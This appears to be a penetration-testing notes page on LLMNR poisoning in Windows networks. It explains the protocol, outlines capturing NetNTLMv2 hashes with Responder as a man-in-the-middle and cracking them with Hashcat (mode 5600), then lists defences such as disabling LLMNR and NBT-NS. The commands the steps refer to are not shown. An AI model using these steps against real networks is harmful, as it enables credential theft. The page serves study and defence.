LLMNR Poisoning
Last updated
Last updated
LLMNR (Link-Local Multicast Name Resolution) is a descentralized application protocol similar to DNS that allows to resolve hostnames in the same local network, which means that its packets are not forwarded by routers and are only transmited in their network segment.
It is included in Windows since Windows Vista, and is the third preferred method to resolve names. The order of preference is the following:
DNS
mDNS
LLMNR
NBNS
In a Windows network, the computers are listening into the port 5355/UDP
and to resolve a name, the client sends a LLMNR query to the multicast address 224.0.0.252
in IPv4 (FF02:0:0:0:0:0:1:3
in IPv6). The queries follow the DNS format and can be use to ask not only for names, but also any other question supported by DNS.
The common case is use LLMNR to resolve names in local link by sending A DNS queries. In this case, the computer that has the queried name should response. But, of course, the query can be responded by anyone, even by an attacker to perform a MITM attack.
The key flaw is that the services utilize a user's username and NTLMv2 password hash when appropriately responded to.
An attack can use Responder to recollect NTLM hashes in networks with Windows machines:
The very first step of an AD pentest is spawning a Responder listener.
Responder spawns a MITM listener:
We have to wait for an user to enter a wrong address so that DNS error is triggered.
Once a DNS error is triggered, we will get a username-hash pair in Responder.
Since Hashcat utilizes GPU instead of CPU (which John the Ripper uses), we crack the hashes on Windows host machine, not Kali virtual machine:
Notes:
Install CUDA SDK first
The hash type is NetNTLMv2 -> 5600
OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules
The best defense in this case is to disable LLMNR and NBT-NS.
To disable LLMNR, select "Turn Off Multicast Name Resolution" under "Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client" in the "Group Policy Editor".
To disable NBT-NS, navigate to "Network Connections -> Network Adapter Properties -> TCP/IPv4 Properties -> Advanced -> WINS" and select "Disable NetBIOS over TCP/IP".
If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to:
Require Network Access Control
Require strong user password (e.g., > 14 characters in length and limit common word usage). The more complex and long the password, the harder it is for an attacker to crack the hash.